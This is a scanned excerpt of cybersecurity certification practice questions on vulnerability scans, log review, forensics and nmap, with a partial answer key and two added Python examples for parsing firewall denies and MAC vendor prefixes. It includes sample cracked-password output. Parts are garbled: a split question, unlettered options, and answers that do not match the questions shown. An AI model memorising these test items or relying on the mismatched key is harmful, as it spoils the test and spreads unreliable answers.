A. The target system’s TCP version 

B. The target system’s operating system 

C. The target system’s MAC address 

D. These fields are only useful for packet analysis. 

53. The collection of objects, the type of the objects, and how they relate to each other to create 
monitoring groups are all implemented as which of the following for SNMP? 

A. MBI 


B. MIB 
C. SMI 
D. OBJ 


54. Ben needs to identify the device or storage type that has the lowest order of volatility. 
Which of the following is the least volatile? 


A. Network traffic 

B. A solid state drive 

C. A spinning hard drive 
D. A DVD-ROM 
55. Jerry recently completed a vulnerability scan of his organization’s data center and received 
the vulnerability report shown here from a server running in the data center. This server is 
running on a virtualization platform running on a bare-metal hypervisor. Where must Jerry 
correct this issue? 

Severity: 4  Microsoft Windows Kernel Elevation of Privileges (MS17-017)  CVSS: -  CVSS3: -  New 
First Detected: 04/04/2017 at 21:52:03 (GMT-0400)  Last Detected: 04/04/2017 at 21:52:03 (GMT-0400)  Times Detected: 1  Last Fixed: N/A 
QID: 91346                                                        CVSS Base: 7.2 
Category: Windows                                                 CVSS Temporal: 5.6 
CVE ID: CVE-2017-0050 CVE-2017-0101 CVE-2017-0102 CVE-2017-0103   CVSS3 Base: 7.8 
                                                                  CVSS3 Temporal: 7 
Vendor Reference: MS17-017                                        CVSS Environment: 
Bugtraq ID: 96025, 96625, 96627, 96623                            Asset Group: 
Service Modified: 03/16/2017                                      Collateral Damage Potential: 
User Modified: -                                                  Target Distribution: 
Edited: No                                                        Confidentiality Requirement: 
PCI Vuln: Yes                                                     Integrity Requirement: 
Ticket State: Open                                                Availability Requirement: 

THREAT: 
Multiple elevation of privilege vulnerabilities exist in the Microsoft Windows Kernel. 
The update addresses the vulnerabilities by correcting how Windows handles objects in memory, validates buffer lengths and inputs. 
Microsoft has rated this vulnerability as Important for all supported releases of Windows. 

IMPACT: 
A local attacker could exploit this vulnerability by running a specially crafted application to take control over the affected system. 

SOLUTION: 
Customers are advised to refer to MS17-017 for more information. 
Patch: 
Following are links for downloading patches to fix the vulnerabilities: 
MS17-017: Windows Vista - 32 bit 
MS17-017: Windows Vista - 64 bit 
MS17-017: Windows Server 2008 
MS17-017: Windows 7 - Security only 
MS17-017: Windows 7 - Monthly rollup 
MS17-017: Windows Server 2008 R2 - Security only 
MS17-017: Windows Server 2008 R2 - Monthly rollup 
MS17-017: Windows 8.1 - Security only 
MS17-017: Windows 8.1 - Monthly rollup 
MS17-017: Windows 10 
MS17-017: Windows 10 Version 1511 
MS17-017: Windows 10 Version 1607 
MS17-017: Windows Server 2016 
MS17-017: Windows Server 2012 - Security only 
MS17-017: Windows Server 2012 - Monthly rollup 
MS17-017: Windows Server 2012 R2 - Security only 
MS17-017: Windows Server 2012 R2 - Monthly rollup 

A. Guest operating system 
B. Hypervisor 
C. Application 
D. Host operating system 


56. Dylan is an IT consultant brought in to assess the maturity of risk management practices at 
a firm using the NIST Cybersecurity Framework. During his evaluation, he determines that 
the organization does use an organization-wide approach to managing cybersecurity risk 
but that it does not use risk-informed policies, processes, and procedures to address poten- 
tial cybersecurity events. At what tier of the Cybersecurity Framework does this organiza- 
tion’s risk management program reside? 


A. Tier 1: Partial 

B. Tier 2: Risk Informed 
C. Tier 3: Repeatable 

D. Tier 4: Adaptive 
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57. After receiving complaints about a system on her network not performing correctly, Kath- 
leen decides to investigate the issue by capturing traffic with Wireshark. The captured traf- 


58. 


fic is shown here. What type of issue is Kathleen most likely seeing? 


File Edit View Go Capture Analyze Statistics Telephony Wireless Tools Help 


57. [Question stem not recovered in this scan.] [Figure: Wireshark capture showing a burst of TCP packets arriving within a fraction of a second, every entry TCP with win=512; columns Time, Source, Destination, Protocol, Length, Info]

A. A link failure

B. A failed three-way handshake

C. A DDoS

D. A SYN flood

58. During a log review Lisa sees repeated firewall entries, as shown here:

Sep 16 2016 23:01:37: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2016 23:01:38: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2016 23:01:39: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
Sep 16 2016 23:01:40: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]

What service is the remote system most likely attempting to access?


A. H.323 
B. SNMP 
C. MS-SQL 
D. Oracle 
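The firewall entries in the question are Cisco ASA 106023 deny messages. The following added example (not from the book) parses them, groups repeated denies by source, destination and destination port, and labels the port using a small table built from the well-known database ports named in the answer key later on this page; the sample lines are the four entries above reflowed onto single lines, and the service table is an assumption standing in for a real service inventory.

```python
"""Parse Cisco ASA %ASA-4-106023 deny messages and flag repeated denies.

Added example for the log-review question above; not the book's code.
"""
import re
from collections import Counter, defaultdict

# One reflowed 106023 line looks like:
#   Sep 16 2016 23:01:37: %ASA-4-106023: Deny tcp src outside:10.10.0.100/53534
#   dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]
ASA_DENY_RE = re.compile(
    r"^(?P<ts>\w{3} \d{1,2} \d{4} \d{2}:\d{2}:\d{2}): %ASA-\d-106023: "
    r"Deny (?P<proto>\w+) src (?P<src_if>\w+):(?P<src_ip>[\d.]+)/(?P<src_port>\d+) "
    r"dst (?P<dst_if>\w+):(?P<dst_ip>[\d.]+)/(?P<dst_port>\d+) "
    r'by access-group "(?P<acl>[^"]+)"'
)

# Assumption: well-known database ports as listed in the answer key on this
# page. A real deployment would consult its own service inventory instead.
WELL_KNOWN_PORTS = {
    1433: "MS-SQL",
    1434: "MS-SQL browser",
    1521: "Oracle",
    3306: "MySQL",
    5432: "PostgreSQL",
}


def parse_asa_deny(line):
    """Return the fields of a 106023 deny line as a dict, or None if the
    line is some other message."""
    m = ASA_DENY_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["src_port"] = int(rec["src_port"])
    rec["dst_port"] = int(rec["dst_port"])
    return rec


def repeated_denies(lines, threshold=3):
    """Group denies by (src_ip, dst_ip, dst_port) and return the groups that
    reach `threshold`, annotated with the likely service and with how many
    distinct source ports were seen. A single source port repeated across
    the group means one connection attempt being retransmitted, whereas many
    source ports mean repeated new attempts."""
    counts = Counter()
    src_ports = defaultdict(set)
    for line in lines:
        rec = parse_asa_deny(line)
        if rec is None:
            continue  # not a 106023 deny; ignore
        key = (rec["src_ip"], rec["dst_ip"], rec["dst_port"])
        counts[key] += 1
        src_ports[key].add(rec["src_port"])

    hits = []
    for (src, dst, port), n in sorted(counts.items()):
        if n >= threshold:
            hits.append({
                "src_ip": src,
                "dst_ip": dst,
                "dst_port": port,
                "count": n,
                "distinct_src_ports": len(src_ports[(src, dst, port)]),
                "service": WELL_KNOWN_PORTS.get(port, "unknown"),
            })
    return hits


# Constructed sample: the four entries from the question, one per line.
SAMPLE_LOG = [
    'Sep 16 2016 23:01:%02d: %%ASA-4-106023: Deny tcp src outside:10.10.0.100/53534 '
    'dst inside:192.168.1.128/1521 by access-group "OUTSIDE" [0x5063b82f, 0x0]' % sec
    for sec in (37, 38, 39, 40)
]

if __name__ == "__main__":
    for hit in repeated_denies(SAMPLE_LOG):
        print(hit)
```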


59. After finishing a forensic case, Lucas needs to wipe the media that he is using to prepare it for the next case. Which of the following methods is best suited to preparing the SSD that he will use?

A. Degauss the drive.

B. Zero write the drive.

C. Use a PRNG.

D. Use the ATA Secure Erase command.


60. Dylan is creating a vulnerability management program for his company. He only has the resources to conduct daily scans of approximately 10 percent of his systems, and the rest will be scheduled for weekly scans. He would like to ensure that the systems containing the most sensitive information receive scans on a more frequent basis. What criteria is Dylan using?

A. Data privacy.

B. Data remanence.

C. Data retention.

D. Data classification.


61. While investigating a cybersecurity incident, Bob discovers the file shown here stored on a system on his network. Which one of the following tools most likely generated this file?

Loaded 3107 password hashes with 3107 different salts (bsdicrypt, BSDI crypt(3) [DES 128/128 SSE2-16])
nguyen (u726-bsdi)
gemini (u1081-bsdi)
rachel (u105-bsdi)
qqqiil (u2542-bsdi)
aylmer (u1713-bsdi)
Snoopy (u884-bsdi)
0U812 (u347-bsdi)
Friends (u873-bsdi)
Anthony (u519-bsdi)
Michelle (u879-bsdi)
Knight (u876-bsdi)
Sierra (u883-bsdi)
Victoria (u1628-bsdi)
Darkman (u1538-bsdi)
Gandalf (u1549-bsdi)
Cardinal (u1527-bsdi)
ABC123 (u2933-bsdi)
Mellon (u1580-bsdi)
Sidekick (u1611-bsdi)
techno (u337-bsdi)
Tigger (u527-bsdi)
mustang (u2417-bsdi)
--More--

A. Cain & Abel

B. Metasploit

C. ftk

D. John the Ripper

62. Which one of the following tools cannot be used as a web application vulnerability scanner?

A. Nikto

B. Acunetix

C. Nmap

D. QualysGuard


63. Peter is designing a vulnerability scanning program for the large chain of retail stores where he works. The store operates point-of-sale terminals in its retail stores as well as an e-commerce website. Which one of the following statements about PCI DSS compliance is not true?

A. Peter’s company must hire an approved scanning vendor to perform vulnerability scans.

B. The scanning program must include, at a minimum, weekly scans of the internal network.

C. The point-of-sale terminals and website both require vulnerability scans.

D. Peter may perform some required vulnerability scans on his own.


64. Rachel discovered the vulnerability shown here when scanning a web server in her organization. Which one of the following approaches would best resolve this issue?

Microsoft IIS Server XSS Elevation of Privilege Vulnerability (MS17-016) CVSS: - CVSS3: - New
First Detected: 04/04/2017 at 21:52:03 (GMT-0400) Last Detected: 04/04/2017 at 21:52:03 (GMT-0400) Times Detected: 1 Last Fixed: N/A
QID: 91339 CVSS Base: 4.3
Category: Windows CVSS Temporal: 3.2
CVE ID: CVE-2017-0055 CVSS3 Base: 6.1
Vendor Reference: MS17-016 CVSS3 Temporal: 5.3
Bugtraq ID: 96622 CVSS Environment:
Service Modified: 03/17/2017 Asset Group:
User Modified: - Collateral Damage Potential:
Edited: No Target Distribution:
PCI Vuln: Yes Confidentiality Requirement:
Ticket State: Open Integrity Requirement:
Availability Requirement:

THREAT:
An elevation of privilege vulnerability exists when Microsoft IIS Server fails to properly sanitize a specially crafted request.
An attacker who successfully exploited this vulnerability could then perform cross-site scripting attacks on affected systems and run script in the security context of the current user.
These attacks could allow the attacker to read content that the attacker is not authorized to read, use the victim's identity to take actions on behalf of the victim, and inject malicious content in the victim's browser.

A. Patching the server

B. Performing input validation

C. Adjusting firewall rules

D. Rewriting the application code
65. Charleen’s incident response team is fighting a rapidly spreading zero-day malware package that silently installs via an Adobe Flash vulnerability when an email attachment is viewed via webmail. After identifying a compromised system, she determines that the system is beaconing to a group of fast flux DNS entries. Which of the following techniques is best suited to identifying other infected hosts?

A. Update antivirus software and scan using the latest definitions.

B. Monitor for the IP addresses associated with the command-and-control systems.

C. Log DNS queries to identify compromised systems.

D. Check email logs for potential recipients of the message.


66. What nmap feature is enabled with the -O flag?

A. OS detection

B. Online/offline detection

C. Origami attack detection

D. Origination port validation


67. Mika uses a security token like the unit shown here and a password to authenticate to her PayPal account. What two types of factors is she using?

[Figure: a VeriSign ID Protection hardware security token]

A. Something she knows and something she has

B. Something she knows and something she is

C. Something she is and something she has

D. Mika is only using one type of factor because she knows the token code and her password.
68. Jose is working with his manager to implement a vulnerability management program for his company. His manager tells him that he should focus on remediating critical and high-severity risks to externally accessible systems. He also tells Jose that the organization does not want to address risks on systems without any external exposure or risks rated medium or lower. Jose disagrees with this approach and believes that he should also address critical and high-severity risks on internal systems. How should he handle the situation?

A. Jose should recognize that his manager has made a decision based upon the organization’s risk appetite and should accept it and carry out his manager’s request.

B. Jose should discuss his opinion with his manager and request that the remediation criteria be changed.

C. Jose should ask his manager’s supervisor for a meeting to discuss his concerns about the manager’s approach.

D. Jose should carry out the remediation program in the manner that he feels is appropriate because it will address all of the risks identified by the manager as well as additional risks.


69. Susan needs to test thousands of submitted binaries. She needs to ensure that the applications do not contain malicious code. What technique is best suited to this need?

A. Sandboxing

B. Implementing a honeypot

C. Decompiling and analyzing the application code

D. Fagan testing


70. Which one of the following is an example of a logical control?

A. Lock and key

B. Firewall rule

C. Background check

D. Security guard

71. Chris is implementing cryptographic controls to protect his organization and would like to use defense-in-depth controls to protect sensitive information stored and transmitted by a web server. Which one of the following controls would be least suitable to directly provide this protection?

A. TLS

B. VPN

C. DLP

D. FDE
72. Alex needs to deploy a solution that will limit access to his network to only authorized individuals while also ensuring that the systems that connect to the network meet his organization’s patching, antivirus, and configuration requirements. Which of the following technologies will best meet these requirements?

A. Whitelisting

B. Port security

C. NAC

D. EAP


73. Chris has been tasked with removing data from systems and devices that leave his organization. One of the devices is a large multifunction device that combines copying, fax, and printing capabilities. It has a built-in hard drive to store print jobs and was used in an office that handles highly sensitive business information. If the multifunction device is leased, what is his best option for handling the drive?

A. Destroy the drive.

B. Reformat the drive using the MFD’s built-in formatting program.

C. Remove the drive and format it using a separate PC.

D. Remove the drive and purge it.


74. Rhonda recently configured new vulnerability scans for her organization’s data center. Completing the scans according to current specifications requires that they run all day, every day. After the first day of scanning, Rhonda received complaints from administrators of network congestion during peak business hours. How should Rhonda handle this situation?

A. Adjust the scanning frequency to avoid scanning during peak times.

B. Request that network administrators increase available bandwidth to accommodate scanning.

C. Inform the administrators of the importance of scanning and ask them to adjust the business requirements.

D. Ignore the request because it does not meet security objectives.
75. After restoring a system from 30-day-old backups after a compromise, administrators at Michelle’s company return the system to service. Shortly after that, Michelle detects similar signs of compromise again. Why is restoring a system from a backup problematic in many cases?

A. Backups cannot be tested for security issues.

B. Restoring from backup may reintroduce the original vulnerability.

C. Backups are performed with the firewall off and are insecure after restoration.

D. Backups cannot be properly secured.

76. Captured network traffic from a compromised system shows it reaching out to a series of five remote IP addresses that change on a regular basis. Since the system is believed to be compromised, the system’s Internet access is blocked, and the system is isolated to a quarantine VLAN. When forensic investigators review the system, no evidence of malware is found. Which of the following scenarios is most likely?

A. The system was not infected, and the detection was a false positive.

B. The beaconing behavior was part of a web bug.

C. The beaconing behavior was due to a misconfigured application.

D. The malware removed itself after losing network connectivity.


77. Which one of the following ISO standards provides guidance on the development and implementation of information security management systems?

A. ISO 27001

B. ISO 9000

C. ISO 11120

D. ISO 23270


78. Mika’s forensic examination of a compromised Linux system is focused on determining what level of access attackers may have achieved using a compromised www account. Which of the following is not useful if she wants to check for elevated privileges associated with the www user?

A. /etc/passwd

B. /etc/shadow

C. /etc/sudoers

D. /etc/group

79. Tracy is validating the web application security controls used by her organization. She wants to ensure that the organization is prepared to conduct forensic investigations of future security incidents. Which one of the following OWASP control categories is most likely to contribute to this effort?

A. Implement logging

B. Validate all inputs

C. Parameterize queries

D. Error and exception handling

80. Gary is using agent-based scanning to assess the security of his environment. Every time that Gary runs a vulnerability scan against a particular system, it causes the system to hang. He spoke with the system administrator who provided him with a report showing that the system is current with patches and has a properly configured firewall that allows access only from a small set of trusted internal servers. Gary and the server administrator both consulted the vendor, and they are unable to determine the cause of the crashes and suspect that it may be a side effect of the agent. What would be Gary’s most appropriate course of action?

A. Approve an exception for this server.

B. Continue scanning the server each day.

C. Require that the issue be corrected in 14 days and then resume scanning.

D. Decommission the server.

81. Brent’s organization runs a web application that recently fell victim to a man-in-the-middle attack. Which one of the following controls serves as the best defense against this type of attack?

A. HTTPS

B. Input validation

C. Patching

D. Firewall
82. During an nmap port scan using the -sV flag to determine service versions, Sarah discovers that the version of SSH on the Linux system she is scanning is not up-to-date. When she asks the system administrators, they inform her that the system is fully patched and that the SSH version is current. What issue is Sarah most likely experiencing?

A. The system administrators are incorrect.

B. The nmap version identification is using the banner to determine the service version.

C. nmap does not provide service version information, so Sarah cannot determine version levels in this way.

D. The systems have not been rebooted since they were patched.


83. Tyler scans his organization’s mail server for vulnerabilities and finds the result shown here. What should be his next step?

Microsoft Exchange Client Access Server Information Di...
Severity: Medium

Plugin Details
ID: 77026
Version: $Revision: 1.2 $
Type: remote
Family: Windows
Published: 2014/08/06
Modified: 2015/09/24

Description
The Microsoft Exchange Client Access Server (CAS) is affected by an information disclosure vulnerability. A remote, unauthenticated attacker can exploit this vulnerability to learn the server's internal IP address.

Solution
There is no known fix at this time.

See Also
http://foofus.net/?p=758

Risk Information
Risk Factor: Medium
CVSS Base Score: 5.0
CVSS Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
CVSS Temporal Vector: CVSS2#E:ND/RL:U/RC:ND
CVSS Temporal Score: 5.0

Output
Nessus was able to verify the issue with the following request :

GET /autodiscover/autodiscover.xml HTTP/1.0
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Connection: Close
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

Which returned the following IP address : 192.168.0.111

443 / tcp / www

Vulnerability Information
CPE: cpe:/a:microsoft:exchange_server
Exploit Available: true
Exploit Ease: Exploits are available
Vulnerability Pub Date: 2014/08/01
Exploited by Nessus: true

Reference Information
BID: 69018

Shut down the server immediately.

Initiate the change management process.

Apply the patch.
84. Carla is performing a penetration test of a web application and would like to use a software package that allows her to modify requests being sent from her system to a remote web server. Which one of the following tools would not meet Carla’s needs?

A. Nessus

B. Burp

C. ZAP

D. Tamper Data

85. Alex learns that a recent Microsoft patch covers a zero-day exploit in Microsoft Office that occurs because of incorrect memory handling. The flaw is described as potentially resulting in memory corruption and arbitrary code execution in the context of the current privilege level. Exploitation of the flaw can occur if victims open a specifically crafted Office document in a vulnerable version of Microsoft Office.

If Alex finds out that approximately 15 of the workstations in his organization have been compromised by this malware, including one workstation belonging to a domain administrator, what phase of the incident response process should he enter next?

A. Preparation

B. Detection and analysis

C. Containment, eradication, and recovery

D. Post-incident activity
Appendix: Answers to Review Questions

Chapter 1: Domain 1: Threat Management

1. C. DNS reverse lookup is an active technique. Google and Shodan are both search engines, while a PGP key server does not interact with the target site and is considered passive reconnaissance. If you’re not immediately familiar with a technique or technology, you can often reduce the possible options. Here, a Google search and a query to a PGP server are obviously not active techniques, and Shodan also describes itself as a search, making a DNS reverse lookup a good guess, even if you’re not familiar with it.

2. A. While it may seem strange, a DNS brute-force attack that queries a list of IPs, common subdomains, or other lists of targets will often bypass intrusion detection and prevention systems that do not pay particular attention to DNS queries. Cynthia may even be able to find a DNS server that is not protected by the organization’s IPS!

nmap scans are commonly used during reconnaissance, and Cynthia can expect them to be detected since they are harder to conceal. Cynthia shouldn’t expect to be able to perform a zone transfer, and if she can, a well-configured IPS should immediately flag the event.


3. C. The Microsoft Baseline Security Analyzer (MBSA) is a tool provided by Microsoft that can identify installed or missing patches as well as common security misconfigurations. Since it is run with administrative rights, it will provide a better view than normal nmap and Nessus scans and provides more detailed information about specific patches that are installed. Metasploit provides some limited scanning capabilities but is not the best tool for the situation.


4. C. Reconnaissance efforts do not include exploitation, and Charleen should not expect to need to include exploitation limitations in the rules of engagement. If she was conducting a full penetration test, she would need to make sure she fully understands any concerns or limitations her client has about exploitation of vulnerabilities.


5. C. MySQL uses port 3306 as its default port. Oracle uses 1521, Postgres uses 5432, and Microsoft SQL uses 1433/1434.


6. B. Heuristic detection methods run the potential malware application and track what occurs. This can allow the anti-malware tool to determine whether the behaviors and actions of the program match those common to malware, even if the file does not match the fingerprint of known malware packages.


7. A. Cynthia’s first action should be to determine whether there is a legitimate reason for the workstation to have the listed ports open.


8. D. bcrypt is a strong password hashing algorithm that includes salts for the stored values. If Charles uses bcrypt, he will have made the best choice from the list, as both MD5 and SHA-1 are not as strong, even with a salt. Encrypting the database may seem like a good idea, but storing plain-text passwords means that an exploit that can read the database while it is decrypted will get plain-text passwords!


9. B. These commands will add filters to the INPUT ruleset that block traffic specifically from hosts A and B, while allowing only port 25 from host C. Option D might appear attractive, but it allows all traffic instead of only SMTP. Option A only drops SMTP traffic from host B (and all of the other hosts in its /24 segment), while Option C allows traffic in from the hosts you want to block!


10. B. While it may be tempting to start immediately after finishing scoping, Jessica’s next step should be to ensure that she has appropriate sign-off and agreement to the scope, timing, and effort involved in the test.


11. C. The NIST process focuses on escalating privileges before browsing the system. If Brian was fortunate enough to compromise an administrative account remotely, he could skip this step, but in most cases, his next step is to find a local exploit or privilege escalation flaw that will allow him to have more control over the system.


12. C. Fortunately, the sshd service has a configuration setting called PermitRootLogin. Setting it to no will accomplish Chris’s goal.


13. C. During penetration tests, red teams are attackers, blue teams are defenders, and the white team establishes the rules of engagement and performance metrics for the test.


14. A. Charles can see that no invalid logins occurred and that someone logged in as the user after business hours. This means that the account has likely been compromised and that he should investigate how the password was lost. (In many cases, Charles needs to ask the VP of finance about bad password habits like writing it down or using a simple password.)


15. C. Detection systems placed in otherwise unused network space will detect scans that blindly traverse IP ranges. Since no public services are listed, attackers who scan this range can be presumed to be hostile and are often immediately blocked by security devices that protect production systems.


16. B. A jump host, or jump box, allows for easier logging of administrative access and can serve as an additional layer of protection between administrative workstations and the protected network. In this case, Angela’s needs are best served by a jump host. Bastion hosts are fully exposed to attacks; administrative virtual machines can be useful but don’t make central auditing quite as easy and may allow a compromised virtual machine host to be a problem. Finally, direct ssh or RDP requires auditing of all administrative workstations and could allow a compromised workstation to cause issues by allowing it to directly connect to the secure network.


17. C. This flow sample shows four distinct hosts being accessed from 192.168.2.1. They are 10.2.3.1, 10.6.2.4, 10.6.2.5, and 10.8.2.5.


18. B. This setting blocks all logins for 120 seconds when five failed attempts occur within 60 seconds. This can slow down brute-force hacking attempts, but Rick should recommend that the organization he is working with may want to consider properly isolating the administrative interfaces via a protected network segment instead of just using a back-off algorithm if they haven’t already.
19. B. The U.S. DoD Trusted Foundry program works to assure the integrity and confidentiality of integrated circuit design and manufacturing. This helps to ensure that agents of foreign governments are not able to insert flaws or code into the ICs that could be leveraged for intelligence or cyberwarfare activities.


20. D. netstat is found on Windows, Linux, and macOS systems and can provide information about other systems on the network and can provide information about open ports and systems that the host has connected to. Chris can search for common web and database server service ports to help identify the local targets he is looking for.


21. B. The NIST SP 800-115 guide describes four penetration testing phases: planning, discovery, attack, and reporting. Alice is conducting a discovery activity. During this phase, she might also scan systems and networks, perform passive intelligence gathering, or use tools to gather additional information about her target.


22. C. By default, nmap uses a TCP SYN scan. If the user does not have proper socket privileges (such as root on a Linux system), it will use a TCP connect scan.


23. D. netcat, telnet, and wget can all be used to conduct Isaac’s banner-grabbing exercise. FTP will not connect properly to get the banner he wants to see.


24. A. Limiting the information available about an organization by requiring authentication will strongly limit the ability of potential attackers to gather information. Secure domain registration may conceal the registration contact’s information but does not provide any real additional protection. Limiting technologies listed in a job posting can help limit what attackers may find out, but most organizations would prefer to better match candidates. Finally, purging all metadata can help protect information about internal systems and devices but is difficult to enforce, and document metadata is not a primary source of information about most organizations.


25. B. Since Cassandra is scanning a wireless network and the system is using an IP address that is commonly used for commodity wireless routers, her best guess should be that this is a wireless router that can be accessed via ssh and that is providing a web management interface and print services. The OS fingerprinting that nmap provides is not always reliable, and the VirtualBox match is a false positive in this case. The actual host scanned is an Asus router running open source firmware and additional software.


26. C. The device allows a telnet connection to port 10001 and identifies itself as an automated tank gauge. John should recommend disabling telnet or protecting the device with a firewall or other security device to prevent unauthorized remote access.


27. B. The command nbtstat -c shows the contents of the NetBIOS name cache and shows a list of name-to-IP address mappings.


28. C. The Wayback Machine and similar sites capture periodic snapshots of websites from across the Internet, allowing penetration testers and others performing reconnaissance activities to gather information from historic versions of their target sites. This also means that long-term data breaches may be archived in sites like these in addition to search engine caches.


29. D. nmap provides Common Platform Enumeration data when the -O (OS fingerprinting) and verbose flags are used. If Kristen had seen the -sV flag instead, she would have expected service version information.


30. B. Banner grabbing is an active process and requires a connection to a remote host to grab the banner. The other methods are all passive and use third-party information that does not require a direct lookup against a remote host.


31. D. While the hostnames cluster1 and cluster1a indicate that there may be a cluster of mail servers, this query does not prove that. Instead, Charleen knows that there are two MX entries for her target. She will also notice that mail hosting is handled by messagelabs, a software-as-a-service provider for email and other managed services, indicating that the public email presence for her target is handled by a specialized company. MX Toolbox allows deeper queries about blacklists and SMTP tests, but this image only shows the links to them and does not provide details.


32. B. nmap supports the use of both HTTP and SOCKS4 proxies, allowing Alex to configure the remote host as an HTTP proxy and bounce his scans through it. This can allow nmap users to leverage their scanning tools without installing them on a protected host or network.


33. D. This chart shows typical latency for a remote system and minimal or at times zero packet loss. This chart shows normal operations, and John can safely report no visible issues.


34. B. By default Apache does not run as an administrative user. In fact, it typically runs as a limited user. To take further useful action, Frank should look for a privilege escalation path that will allow him to gain further access.


35. D. Caitlyn is preparing a decomposition diagram that maps the high-level functions to lower-level components. This will allow her to better understand how the malware package works and may help her identify areas she should focus on.


36. C. Alex knows that systems that are exposed to the Internet like DMZ systems are constantly being scanned. She should rate the likelihood of the scan occurring as high. In fact, there is a good chance that a scan will be occurring while she is typing up her report!


37. C. Availability analysis targets whether a system or service is working as expected. While an SIEM may not have direct availability analysis capabilities, reporting on when logs and other data are not received from source systems can help detect outages. Ideally, Lucy’s organization should be using a system monitoring tool that can alarm on availability issues as well as common system problems such as excessive memory, network, disk, or CPU usage.


38. C. When faced with massive numbers of notification messages that are sent too aggressively, administrators are likely to ignore or filter the alerts. Once they do, they are unlikely to respond to actual issues, causing all of the advantages of monitoring to be lost. If she doesn’t spend some time identifying reasonable notification thresholds and frequencies, Lucy’s next conversation is likely to be with an angry system administrator or manager.
39. D. Lucy has configured a behavior-based detection. It is likely that a reasonable percentage of the detections will be for legitimate travel for users who typically do not leave the country, but pairing this behavioral detection with other behavioral or anomaly detections can help determine whether the login is legitimate.


40. C. John is performing static analysis, which is analysis performed without running code. He can use tools or manually review the code (and, in fact, is likely to do both).


41. B. Lauren’s team should use full-disk encryption or volume encryption and should secure the encryption keys properly. This will ensure that any data that remains cannot be exposed to future users of the virtual infrastructure. While many cloud providers have implemented technology to ensure that this won’t happen, Lauren can avoid any potential issues by ensuring that she has taken proactive action to prevent data exposure. Using a zero wipe is often impossible because virtual environments may move without her team’s intervention, data masking will not prevent unmasked data or temporary data stored on the virtual disks from being exposed, and spanning multiple virtual disks will still leave data accessible, albeit possibly in fragmented form.


42. C. When endpoints are connected without a network control point between them, a host-based solution is required. In this case, Lucca’s specific requirement is to prevent attacks, rather than simply detect them, meaning that a HIPS is required to meet his needs. Many modern products combine HIPS capabilities with other features such as data loss prevention and system compliance profiling, so Lucca may end up with additional useful capabilities if he selects a product with those features.


43. B. By default, an iptables firewall will have INPUT, OUTPUT, and FORWARD chains. Geoff should set the policy of all three chains to DROP to stop all traffic to or from a machine.


44. B. Most SaaS providers do not want their customers conducting port scans of their service, and many are glad to provide security assertions and attestations including audits, testing information, or contractual language that addresses potential security issues. Using a different scanning tool, engaging a third-party tester, or even using a VPN are not typically valid answers in a scenario like this.


A. Device manufacturer identification relies on the MAC address that includes a vendor 
prefix. Since MAC addresses can be changed in software, this is not guaranteed to be 
accurate, but in most cases, you can reasonably expect it to match the manufacturer of the 
NIC. The complete list of prefixes can be found at http://standards-oui.ieee.org/oui/oui.txt. 
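
The OUI lookup this answer describes, as an added example that is not part of the book: it parses a constructed excerpt written in the format of the IEEE oui.txt file, normalizes a MAC address given in any common notation, looks up the 24-bit vendor prefix, and also reports whether the locally administered bit is set, which is the first hint a practitioner has that an address was changed in software. The table entries and MAC addresses below are constructed for the example.

```python
"""Vendor lookup for MAC addresses using the IEEE OUI list format (added example, not from the book)."""
import re

# Constructed excerpt in the layout of the IEEE oui.txt file; not the real file.
OUI_TXT = """\
OUI/MA-L                                                    Organization
company_id                                                  Organization
                                                            Address

00-00-0C   (hex)\t\tCisco Systems, Inc
00000C     (base 16)\t\tCisco Systems, Inc
\t\t\t\t170 West Tasman Drive
\t\t\t\tSan Jose  CA  95134
\t\t\t\tUS

00-50-56   (hex)\t\tVMware, Inc.
005056     (base 16)\t\tVMware, Inc.
\t\t\t\t3401 Hillview Avenue
\t\t\t\tPalo Alto  CA  94304
\t\t\t\tUS
"""

# Only the "(hex)" lines carry the prefix-to-vendor mapping; address lines are ignored.
_HEX_LINE = re.compile(
    r"^([0-9A-Fa-f]{2})-([0-9A-Fa-f]{2})-([0-9A-Fa-f]{2})\s+\(hex\)\s+(.+?)\s*$")


def parse_oui(text):
    """Return {"00000C": "Cisco Systems, Inc", ...} from oui.txt-formatted text."""
    table = {}
    for line in text.splitlines():
        m = _HEX_LINE.match(line)
        if m:
            prefix = (m.group(1) + m.group(2) + m.group(3)).upper()
            table[prefix] = m.group(4)
    return table


def normalize_mac(mac):
    """Accept 00:00:0c:aa:bb:cc, 00-00-0C-AA-BB-CC or 0000.0caa.bbcc; return 12 uppercase hex digits."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac).upper()
    if len(digits) != 12:
        raise ValueError("not a 48-bit MAC address: %r" % mac)
    return digits


def classify_mac(mac, table):
    """Return (vendor or None, locally_administered).

    The second-least-significant bit of the first octet is the U/L bit: when it is set the
    address was assigned locally (randomized or spoofed), so the OUI cannot be trusted
    to identify the NIC's manufacturer even if it happens to match an entry.
    """
    digits = normalize_mac(mac)
    locally_administered = bool(int(digits[:2], 16) & 0x02)
    vendor = table.get(digits[:6])
    return vendor, locally_administered
```

A real deployment loads the full oui.txt (and the MA-M/MA-S lists for 28- and 36-bit prefixes) rather than the excerpt above, and treats a locally administered address as "unknown NIC" regardless of any prefix hit.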


C. While spam to a registrant’s email address may seem trivial, it may mean that impor- 
tant messages related to the domain are missed. The best way to limit this is to use a 
privacy or proxy service to register the domain. Many, if not most, popular registration 
services offer a privacy service, sometimes at an extra charge. Unfortunately, if a domain 
was registered before a privacy or proxy service was enabled, the earlier registration details 
can still be looked up in historical WHOIS data and used. 


